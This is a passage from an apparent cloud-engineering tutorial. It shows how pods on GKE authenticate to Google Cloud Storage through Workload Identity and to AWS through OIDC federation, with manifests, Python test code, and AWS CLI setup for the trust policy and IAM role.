&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ServiceAccount&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;iam.gke.io/gcp-service-account&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-cross-cloud-sa@YOUR_PROJECT_ID.iam.gserviceaccount.com&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-gcp-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;restartPolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Never&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;sh&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;-c&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
        &lt;span class="s"&gt;pip install --no-cache-dir google-auth google-cloud-storage &amp;amp;&amp;amp; \&lt;/span&gt;
        &lt;span class="s"&gt;python /app/test_gcp_from_gke.py&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;GCP_PROJECT_ID&lt;/span&gt;
      &lt;span class="c1"&gt;# Replace with your actual project ID&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_PROJECT_ID"&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
    &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test-code-gke&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test-code-gke&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_gcp_from_gke.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code will be provided below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
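&lt;p&gt;The manifest above carries two &lt;code&gt;YOUR_PROJECT_ID&lt;/code&gt; placeholders: one in the &lt;code&gt;iam.gke.io/gcp-service-account&lt;/code&gt; annotation and one in the &lt;code&gt;GCP_PROJECT_ID&lt;/code&gt; env var. A hypothetical pre-apply substitution step, sketched in Python (pure string work, no cluster access):&lt;/p&gt;

```python
# Hypothetical helper: fill in the YOUR_PROJECT_ID placeholders before
# piping the manifest into kubectl apply.

def render_manifest(template: str, project_id: str) -> str:
    """Replace every YOUR_PROJECT_ID placeholder with the real project ID."""
    return template.replace("YOUR_PROJECT_ID", project_id)

snippet = "iam.gke.io/gcp-service-account: gke-cross-cloud-sa@YOUR_PROJECT_ID.iam.gserviceaccount.com"
print(render_manifest(snippet, "my-project"))
# iam.gke.io/gcp-service-account: gke-cross-cloud-sa@my-project.iam.gserviceaccount.com
```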



&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_gcp_from_gke.py
&lt;/span&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;google.cloud&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;storage&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;google.auth&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;default&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_gcp_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Test GCP GCS access using native GKE Workload Identity&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# Automatically uses workload identity
&lt;/span&gt;        &lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;project&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;default&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="n"&gt;storage_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;storage&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;Client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;project&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;GCP_PROJECT_ID&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# List buckets
&lt;/span&gt;        &lt;span class="n"&gt;buckets&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;storage_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_results&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;✅ GCP Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buckets&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; GCS buckets:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;bucket&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;buckets&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;bucket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;🔐 Authenticated with project: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;project&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;❌ GCP Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;traceback&lt;/span&gt;
        &lt;span class="n"&gt;traceback&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print_exc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_gcp_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
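&lt;p&gt;The &lt;code&gt;default()&lt;/code&gt; call in the test code above resolves credentials by falling back to the GKE metadata server, which returns an access token for the bound GCP service account. The sketch below is a hedged illustration, not the library code: it only constructs the request that &lt;code&gt;google-auth&lt;/code&gt; ends up making and performs no network call:&lt;/p&gt;

```python
# Sketch of the token request google-auth makes on GKE. Nothing here
# talks to the network; it only shows the shape of the call.
from urllib.parse import urlencode

METADATA_HOST = "http://metadata.google.internal"
TOKEN_PATH = "/computeMetadata/v1/instance/service-accounts/default/token"

def metadata_token_request(scopes=None):
    """Return (url, headers) for the metadata-server token endpoint."""
    url = METADATA_HOST + TOKEN_PATH
    if scopes:
        url += "?" + urlencode({"scopes": ",".join(scopes)})
    # Every metadata request must carry this header or it is rejected.
    headers = {"Metadata-Flavor": "Google"}
    return url, headers

url, headers = metadata_token_request()
print(url)
print(headers)
```

This is why no key file or projected token appears anywhere in the manifest: the credential lookup happens inside the node's metadata endpoint, which GKE intercepts per pod.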



&lt;p&gt;&lt;strong&gt;Success Logs:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If the pod logs (&lt;code&gt;kubectl logs -f -n default gke-gcp-test&lt;/code&gt;) look like the output below, GKE to GCP authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;✅ GCP Authentication successful!
Found &amp;lt;number&amp;gt; GCS buckets:
  - bucket-1
  - bucket-2
  - gke-cross-cloud
  - ...

🔐 Authenticated with project: YOUR_PROJECT_ID
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.2 Authenticating to AWS from GKE
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Cross-Cloud Authentication Flow:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl67wwteu1ud1jry62uzf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl67wwteu1ud1jry62uzf.png" alt="gke to aws" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;
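&lt;p&gt;The last hop in the flow above is the pod presenting its GKE-issued OIDC token to AWS STS via &lt;code&gt;AssumeRoleWithWebIdentity&lt;/code&gt;. The sketch below only shows the shape of that STS request; the role ARN, session name, and token are placeholders, and in practice the AWS SDK builds the call for you:&lt;/p&gt;

```python
# Sketch of the STS AssumeRoleWithWebIdentity query string a GKE pod
# would send with its projected service-account token. Placeholders
# throughout; no network call is made.
from urllib.parse import urlencode

def assume_role_query(role_arn: str, web_identity_token: str, session_name: str) -> str:
    """Build the query string for an STS AssumeRoleWithWebIdentity call."""
    params = {
        "Action": "AssumeRoleWithWebIdentity",
        "Version": "2011-06-15",  # STS API version
        "RoleArn": role_arn,
        "RoleSessionName": session_name,
        "WebIdentityToken": web_identity_token,  # the GKE OIDC JWT
    }
    return urlencode(params)

qs = assume_role_query(
    "arn:aws:iam::123456789012:role/gke-to-aws-role",  # placeholder role
    "eyJhbGciOi...",  # truncated JWT placeholder
    "gke-pod-session",
)
print(qs)
```

Unlike most AWS APIs, this call is unsigned: the web identity token itself is the proof of identity, which is exactly why the trust policy created below must pin the issuer and subject.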

&lt;p&gt;&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Get GKE OIDC provider URL&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;CLUSTER_LOCATION&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"us-central1"&lt;/span&gt;  &lt;span class="c"&gt;# Change to your cluster location (region or zone)&lt;/span&gt;

&lt;span class="c"&gt;# Get the full OIDC issuer URL&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;curl &lt;span class="nt"&gt;-s&lt;/span&gt; https://container.googleapis.com/v1/projects/YOUR_PROJECT_ID/locations/us-central1/clusters/my-gke-cluster/.well-known/openid-configuration | jq &lt;span class="nt"&gt;-r&lt;/span&gt; .issuer&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"OIDC Issuer: &lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# 2. Create OIDC provider in AWS&lt;/span&gt;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;AWS_PROFILE&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&amp;lt;&lt;span class="nb"&gt;set &lt;/span&gt;to aws profile where you want to create this&amp;gt;

&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_ISSUER&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"s/^https:&lt;/span&gt;&lt;span class="se"&gt;\/\/&lt;/span&gt;&lt;span class="s2"&gt;//"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Extract hostname for thumbprint&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_HOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_ISSUER&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="s1"&gt;'s|https://||'&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="s1"&gt;'s|/.*||'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Get the thumbprint&lt;/span&gt;
&lt;span class="nv"&gt;THUMBPRINT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; | openssl s_client &lt;span class="nt"&gt;-servername&lt;/span&gt; &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_HOST&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="nt"&gt;-connect&lt;/span&gt; &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_HOST&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;:443 &lt;span class="nt"&gt;-showcerts&lt;/span&gt; 2&amp;gt;/dev/null &lt;span class="se"&gt;\&lt;/span&gt;
  | openssl x509 &lt;span class="nt"&gt;-fingerprint&lt;/span&gt; &lt;span class="nt"&gt;-sha1&lt;/span&gt; &lt;span class="nt"&gt;-noout&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="s1"&gt;'s/SHA1 Fingerprint=//;s/://g'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Thumbprint: &lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;THUMBPRINT&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# Create the OIDC provider in AWS&lt;/span&gt;
aws iam create-open-id-connect-provider &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--url&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_ISSUER&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--client-id-list&lt;/span&gt; sts.amazonaws.com &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--thumbprint-list&lt;/span&gt; &lt;span class="nv"&gt;$THUMBPRINT&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create trust policy&lt;/span&gt;
&lt;span class="nv"&gt;YOUR_AWS_ACCOUNT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;aws sts get-caller-identity | jq &lt;span class="nt"&gt;-r&lt;/span&gt; .Account&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; gke-aws-trust-policy.json &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;YOUR_AWS_ACCOUNT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:oidc-provider/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:sub": "system:serviceaccount:default:gke-cross-cloud-sa",
          "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;&lt;span class="c"&gt;# 4. Create IAM role&lt;/span&gt;
aws iam create-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; gke-to-aws-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assume-role-policy-document&lt;/span&gt; file://gke-aws-trust-policy.json

&lt;span class="c"&gt;# 5. Attach permissions&lt;/span&gt;
aws iam attach-role-policy &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; gke-to-aws-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--policy-arn&lt;/span&gt; arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
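The trust policy above wires three strings together: the provider path derived from the issuer URL (scheme stripped), the `sub` condition naming the Kubernetes ServiceAccount, and the `aud` of `sts.amazonaws.com`. A minimal Python sketch of that derivation, mirroring the `sed` steps; the issuer URL and account ID below are placeholder values, not real identifiers:

```python
# Sketch: derive the trust-policy fields the same way the shell steps do.
# The issuer and account ID are illustrative placeholders.
from urllib.parse import urlparse

def trust_policy_fields(oidc_issuer, account_id, namespace, service_account):
    # Strip the https:// scheme, mirroring: sed -e "s/^https:\/\///"
    provider = oidc_issuer.removeprefix("https://")
    # Hostname only, mirroring: sed 's|https://||' | sed 's|/.*||'
    host = urlparse(oidc_issuer).netloc
    return {
        "federated_arn": f"arn:aws:iam::{account_id}:oidc-provider/{provider}",
        "sub_condition_key": f"{provider}:sub",
        "sub": f"system:serviceaccount:{namespace}:{service_account}",
        "aud": "sts.amazonaws.com",
        "thumbprint_host": host,
    }

fields = trust_policy_fields(
    "https://container.googleapis.com/v1/projects/example/locations/us-central1/clusters/demo",
    "111122223333", "default", "gke-cross-cloud-sa",
)
print(fields["federated_arn"])
print(fields["sub"])
```

If any of these three strings disagrees between the trust policy and the token the pod presents, `AssumeRoleWithWebIdentity` is denied.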



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Submit the manifest below to validate Scenario 3.2. If authentication is working, you will see the success logs shown below.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# scenario3-2-gke-to-aws.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-aws-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
